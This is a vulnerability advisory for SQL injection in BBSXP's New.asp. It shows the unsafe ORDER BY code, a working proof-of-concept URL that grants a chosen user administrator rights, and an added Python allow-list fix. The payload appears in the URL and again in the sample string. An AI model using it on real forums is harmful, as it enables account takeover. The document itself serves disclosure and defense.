BBSXP forum: insufficient filtering in New.asp leads to SQL injection
Affected systems:
BBSXP 7.3
BBSXP 2008
Vulnerable file:
New.asp
Code analysis:
Sort=HTMLEncode(Request("Sort")) ' line 24
if Sort = empty then
SqlSort="ThreadID"
else
SqlSort=Sort
end if
......
sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" ' line 66
The filter function HTMLEncode, in the file BBSXP_Class.asp:
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&#38;") ' "&"
fString=Replace(fString,CHR(32),"&#32;") ' " "
fString=Replace(fString,CHR(34),"&quot;") ' """
fString=Replace(fString,CHR(39),"&#39;") ' "'"
fString=Replace(fString,CHR(42)&CHR(42),"&#42;&#42;") ' "**" (i.e. /**/)
fString=Replace(fString,CHR(44),"&#44;") ' ","
fString=Replace(fString,CHR(45)&CHR(45),"&#45;&#45;") ' "--"
fString=Replace(fString,CHR(60),"&#60;") ' "<"
fString=Replace(fString,CHR(62),"&#62;") ' ">"
fString=Replace(fString,CHR(92),"&#92;") ' "\"
fString=Replace(fString,CHR(59),"&#59;") ' ";"
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])(*)&#59;","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then ' filter katakana (Japanese characters) [\u30A0-\u30FF], by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30()","&#x30$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
HTMLEncode strips the Tab character and encodes the space and the "**" sequence, but it only substitutes characters; it never checks that Sort is one of the Threads table's real column names.
Because SqlSort is concatenated unquoted into the ORDER BY clause, any value that survives HTMLEncode reaches the database as-is, which is the SQL injection vulnerability.
Proof of concept:
http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid
This successfully made the user lovemmm an administrator. (Best to submit it via POST, heh.)
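As an added illustration (not code from BBSXP or from the advisory's author), the following Python models the Replace() chain of HTMLEncode shown above and places beside it the allow-list check that New.asp lacks: the ORDER BY column is mapped to one of our own constants, so the raw request value never reaches the SQL string. Assumptions: the column names other than ThreadID are hypothetical stand-ins for the Threads table's real sortable columns, the BBSXP_ table prefix is taken from the proof-of-concept URL, the ReplaceText and katakana steps of HTMLEncode are omitted (they do not affect a column name), and the digit pattern used to repair "&#..;" entities is a guess at what the garbled ReplaceText pattern stood for.

```python
import re

# Constructed from the Replace() calls in HTMLEncode, in the same order.
# This is a model for illustration, not BBSXP's code.
HTMLENCODE_REPLACEMENTS = [
    ("\t", ""), ("\r", ""), ("\x16", ""),
    ("&", "&#38;"), (" ", "&#32;"), ('"', "&quot;"), ("'", "&#39;"),
    ("**", "&#42;&#42;"), (",", "&#44;"), ("--", "&#45;&#45;"),
    ("<", "&#60;"), (">", "&#62;"), ("\\", "&#92;"), (";", "&#59;"),
    ("\n", "<br>"),
]

# Assumed form of the garbled ReplaceText pattern "([&#])(*)&#59;": it undoes the
# ";" -> "&#59;" substitution inside entities the earlier lines just produced.
ENTITY_REPAIR_RE = re.compile(r"([&#])(\d*)&#59;")


def html_encode(value):
    """Model of BBSXP's HTMLEncode: character substitution only, no validation."""
    for old, new in HTMLENCODE_REPLACEMENTS:
        value = value.replace(old, new)
    return ENTITY_REPAIR_RE.sub(r"\1\2;", value)


# The Sort value from the advisory's proof-of-concept URL (copied from the page).
SAMPLE_SORT_VALUE = (
    "ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where"
    "/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from"
    "/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid"
)

# Allow-list of columns a user may sort by. Only "ThreadID" appears on the page;
# the other two are hypothetical names standing in for real Threads columns.
ALLOWED_SORT_COLUMNS = ("ThreadID", "LastPostTime", "Replies")

# A column name is a bare identifier; anything else in Sort is worth logging.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def is_plain_identifier(value):
    """Cheap pre-check / detection rule: column names never contain /, *, = or spaces."""
    return bool(IDENTIFIER_RE.match(value))


def safe_sort_column(sort_param, default="ThreadID"):
    """Map the request parameter to one of the allowed column names, or refuse.

    Returns the canonical constant (never the raw input), so the value spliced
    into the SQL string is always one of our own literals.
    """
    if not sort_param:
        return default
    for column in ALLOWED_SORT_COLUMNS:
        if sort_param.lower() == column.lower():
            return column
    raise ValueError("Sort is not an allowed column: %r" % sort_param)


def build_threads_query(sort_param, top=20, table_prefix="BBSXP_"):
    """Same query shape as New.asp line 66 (forum/time filters omitted), with
    the ORDER BY column validated before concatenation."""
    column = safe_sort_column(sort_param)
    return "Select top %d * from [%sThreads] where Visible=1 order by [%s] desc" % (
        top, table_prefix, column)


if __name__ == "__main__":
    print("HTMLEncode leaves the sample untouched:",
          html_encode(SAMPLE_SORT_VALUE) == SAMPLE_SORT_VALUE)
    print(build_threads_query("ThreadID"))
    try:
        build_threads_query(SAMPLE_SORT_VALUE)
    except ValueError as exc:
        print("rejected:", exc)
```

Running the script shows that the sample value passes through the encoding model unchanged, while the allow-list raises before any SQL is built. The same allow-list idea carries over directly to the ASP code: replace `SqlSort=Sort` with a Select Case over the permitted column names and fall back to "ThreadID" otherwise.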